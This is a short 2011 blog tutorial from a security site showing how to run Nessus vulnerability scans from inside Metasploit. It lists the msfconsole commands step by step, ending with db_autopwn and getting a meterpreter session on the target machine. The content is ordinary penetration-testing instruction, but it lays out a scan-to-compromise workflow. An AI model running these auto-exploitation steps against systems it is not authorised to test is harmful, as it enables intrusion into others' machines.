pbnetworks - Computer Security Solutions

pbnetworks - Computer Security Solutions

03/15/11 Metasploit Nessus bridge part I

This video demonstrates using nessus within the Metasploit framework.&nbsp; I found that doing a separate nessus scan and importing the results into Metasploit had too many steps.  Below is the steps involved along with the video.<br />
1.   open terminal and start nessus -
2.   open terminal and start metasploit
3.   msf> load nessus
4.   msf> nessus_help (commands to use)
5.   msf> nessus_connect username:password@localhost:8834 ok
6.   msf> nessus_scan_new 1 target x.x.x.x (ip address)
7.   msf> nessus_scan_status
8.   msf> nessus_report_list
9.   msf> nessus_report_host UID
10. msf> nessus_report_host_ports x.x.x.x (ip address) UID
11. msf> db_driver sqlite3
12. msf> db_connect (db_destroy to remove hosts)
13. msf> nessus_report_get UID
14. msf> db_hosts
15. msf> db_autopwn -t -x
Use one of the vulnerabilities found by autopwn against target machine and get meterpreter session.

Return to Home
Copyright © 2024 pbnetworks. All Rights Reserved. ip information